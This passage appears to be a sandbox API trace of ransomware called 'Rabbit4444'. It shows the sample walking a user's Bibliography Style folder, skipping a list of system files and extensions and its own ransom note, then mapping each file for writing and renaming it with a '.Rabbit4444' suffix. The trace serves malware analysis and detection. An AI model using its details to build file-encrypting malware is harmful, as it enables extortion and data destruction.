| out: lpPerformanceCount=0x130bfc8*=14480858951) returned 1 [0053.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0053.498] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101e20 | out: hHeap=0xe0000) returned 1 [0053.498] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.501] CloseHandle (hObject=0x298) returned 1 [0053.501] CloseHandle (hObject=0x278) returned 1 [0053.501] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.Rabbit4444") returned 96 [0053.501] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\IEEE2006OfficeOnline.xsl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\ieee2006officeonline.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.501] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2cbf800, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x42132, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ISO690.XSL", cAlternateFileName="")) returned 1 [0053.501] lstrcmpiW (lpString1="ISO690.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.501] lstrcmpiW (lpString1="ISO690.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.501] lstrcmpiW (lpString1="ISO690.XSL", lpString2="Rabbit4444.exe") returned -1 [0053.501] lstrcmpiW (lpString1="ISO690.XSL", lpString2=".") returned 1 [0053.501] lstrcmpiW (lpString1="ISO690.XSL", lpString2="..") returned 1 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="windows") returned -1 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="bootmgr") returned 1 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="pagefile.sys") returned -1 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="boot") returned 1 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="ids.txt") returned 1 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="NTUSER.DAT") returned -1 [0053.502] lstrcpyW (in: lpString1=0x130ebb2, lpString2="ISO690.XSL" | out: lpString1="ISO690.XSL") returned="ISO690.XSL" [0053.502] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL", dwFileAttributes=0x0) returned 1 [0053.502] lstrlenW (lpString="ISO690.XSL") returned 10 [0053.502] lstrlenW (lpString="Rabbit4444") returned 10 [0053.502] lstrcmpiW (lpString1="ISO690.XSL", lpString2="Rabbit4444") returned -1 [0053.502] lstrlenW (lpString=".dll") returned 4 [0053.502] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.502] lstrlenW (lpString=".lnk") returned 4 [0053.502] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.502] lstrlenW (lpString=".ini") returned 4 [0053.502] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.502] lstrlenW (lpString=".sys") returned 4 [0053.502] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.502] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.502] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.502] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14481317218) returned 1 [0053.502] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=270642) returned 1 [0053.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0053.503] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0053.503] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x42440, lpName=0x0) returned 0x298 [0053.504] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x42440) returned 0x70000 [0053.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0053.513] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0053.513] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0053.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0053.514] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14482441770) returned 1 [0053.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0053.514] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0053.514] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.516] CloseHandle (hObject=0x298) returned 1 [0053.516] CloseHandle (hObject=0x278) returned 1 [0053.517] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.Rabbit4444") returned 82 [0053.517] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.517] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2bb4725, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x351ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ISO690Nmerical.XSL", cAlternateFileName="ISO690~1.XSL")) returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="Rabbit4444.exe") returned -1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2=".") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="..") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="windows") returned -1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="bootmgr") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="pagefile.sys") returned -1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="boot") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="ids.txt") returned 1 [0053.517] lstrcmpiW (lpString1="ISO690Nmerical.XSL", lpString2="NTUSER.DAT") returned -1 [0053.517] lstrcpyW (in: lpString1=0x130ebb2, lpString2="ISO690Nmerical.XSL" | out: lpString1="ISO690Nmerical.XSL") returned="ISO690Nmerical.XSL" [0053.517] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL", dwFileAttributes=0x0) returned 1 [0053.518] lstrlenW (lpString="ISO690Nmerical.XSL") returned 18 [0053.518] lstrlenW (lpString="Rabbit4444") returned 10 [0053.518] lstrcmpiW (lpString1="erical.XSL", lpString2="Rabbit4444") returned -1 [0053.518] lstrlenW (lpString=".dll") returned 4 [0053.518] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.518] lstrlenW (lpString=".lnk") returned 4 [0053.518] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.518] lstrlenW (lpString=".ini") returned 4 [0053.518] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.518] lstrlenW (lpString=".sys") returned 4 [0053.518] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.518] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.518] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14482902739) returned 1 [0053.518] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=217578) returned 1 [0053.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0053.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0053.518] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x354f0, lpName=0x0) returned 0x298 [0053.519] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x354f0) returned 0x70000 [0053.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0053.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0053.528] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0053.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0053.528] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14483880269) returned 1 [0053.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0053.528] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0053.528] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.530] CloseHandle (hObject=0x298) returned 1 [0053.530] CloseHandle (hObject=0x278) returned 1 [0053.530] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.Rabbit4444") returned 90 [0053.530] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\ISO690Nmerical.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\iso690nmerical.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.531] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x372dd15, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3e4f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MLASeventhEditionOfficeOnline.xsl", cAlternateFileName="MLASEV~1.XSL")) returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="Rabbit4444.exe") returned -1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2=".") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="..") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="windows") returned -1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="bootmgr") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="pagefile.sys") returned -1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="boot") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="ids.txt") returned 1 [0053.531] lstrcmpiW (lpString1="MLASeventhEditionOfficeOnline.xsl", lpString2="NTUSER.DAT") returned -1 [0053.531] lstrcpyW (in: lpString1=0x130ebb2, lpString2="MLASeventhEditionOfficeOnline.xsl" | out: lpString1="MLASeventhEditionOfficeOnline.xsl") returned="MLASeventhEditionOfficeOnline.xsl" [0053.531] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl", dwFileAttributes=0x0) returned 1 [0053.531] lstrlenW (lpString="MLASeventhEditionOfficeOnline.xsl") returned 33 [0053.531] lstrlenW (lpString="Rabbit4444") returned 10 [0053.531] lstrcmpiW (lpString1="Online.xsl", lpString2="Rabbit4444") returned -1 [0053.531] lstrlenW (lpString=".dll") returned 4 [0053.532] lstrcmpiW (lpString1=".xsl", lpString2=".dll") returned 1 [0053.532] lstrlenW (lpString=".lnk") returned 4 [0053.532] lstrcmpiW (lpString1=".xsl", lpString2=".lnk") returned 1 [0053.532] lstrlenW (lpString=".ini") returned 4 [0053.532] lstrcmpiW (lpString1=".xsl", lpString2=".ini") returned 1 [0053.532] lstrlenW (lpString=".sys") returned 4 [0053.532] lstrcmpiW (lpString1=".xsl", lpString2=".sys") returned 1 [0053.532] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.532] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.532] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14484267261) returned 1 [0053.532] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=255219) returned 1 [0053.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0053.532] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0053.532] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3e800, lpName=0x0) returned 0x298 [0053.533] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3e800) returned 0x70000 [0053.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0053.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0053.541] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0053.541] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0053.542] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14485230249) returned 1 [0053.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0053.542] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0053.542] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.544] CloseHandle (hObject=0x298) returned 1 [0053.544] CloseHandle (hObject=0x278) returned 1 [0053.544] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.Rabbit4444") returned 105 [0053.544] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\MLASeventhEditionOfficeOnline.xsl.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\mlaseventheditionofficeonline.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.545] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e1a2f1, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e1a2f1, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2b42021, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x3d5c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SIST02.XSL", cAlternateFileName="")) returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="Rabbit4444.exe") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2=".") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="..") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="windows") returned -1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="bootmgr") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="pagefile.sys") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="boot") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="ids.txt") returned 1 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="NTUSER.DAT") returned 1 [0053.545] lstrcpyW (in: lpString1=0x130ebb2, lpString2="SIST02.XSL" | out: lpString1="SIST02.XSL") returned="SIST02.XSL" [0053.545] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL", dwFileAttributes=0x0) returned 1 [0053.545] lstrlenW (lpString="SIST02.XSL") returned 10 [0053.545] lstrlenW (lpString="Rabbit4444") returned 10 [0053.545] lstrcmpiW (lpString1="SIST02.XSL", lpString2="Rabbit4444") returned 1 [0053.545] lstrlenW (lpString=".dll") returned 4 [0053.545] lstrcmpiW (lpString1=".XSL", lpString2=".dll") returned 1 [0053.546] lstrlenW (lpString=".lnk") returned 4 [0053.546] lstrcmpiW (lpString1=".XSL", lpString2=".lnk") returned 1 [0053.546] lstrlenW (lpString=".ini") returned 4 [0053.546] lstrcmpiW (lpString1=".XSL", lpString2=".ini") returned 1 [0053.546] lstrlenW (lpString=".sys") returned 4 [0053.546] lstrcmpiW (lpString1=".XSL", lpString2=".sys") returned 1 [0053.546] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0053.546] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0053.546] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14485666865) returned 1 [0053.546] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=251336) returned 1 [0053.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ba8 [0053.546] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0053.546] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3d8d0, lpName=0x0) returned 0x298 [0053.548] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3d8d0) returned 0x70000 [0053.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0053.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0053.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0053.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0053.558] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0053.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0053.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0053.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0053.558] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14486890721) returned 1 [0053.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ba8 | out: hHeap=0xe0000) returned 1 [0053.558] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0053.558] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0053.561] CloseHandle (hObject=0x298) returned 1 [0053.561] CloseHandle (hObject=0x278) returned 1 [0053.561] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.Rabbit4444") returned 82 [0053.561] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\SIST02.XSL.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\bibliography\\style\\sist02.xsl.rabbit4444"), dwFlags=0x1) returned 1 [0053.561] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e40435, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x2e40435, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x2b1bddb, ftLastWriteTime.dwHighDateTime=0x1d32745, nFileSizeHigh=0x0, nFileSizeLow=0x54256, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TURABIAN.XSL", cAlternateFileName="")) returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="Rabbit4444.exe") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2=".") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="..") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="windows") returned -1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="bootmgr") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="pagefile.sys") returned 1 [0053.561] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="boot") returned 1 [0053.562] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="ids.txt") returned 1 [0053.562] lstrcmpiW (lpString1="TURABIAN.XSL", lpString2="NTUSER.DAT") returned 1 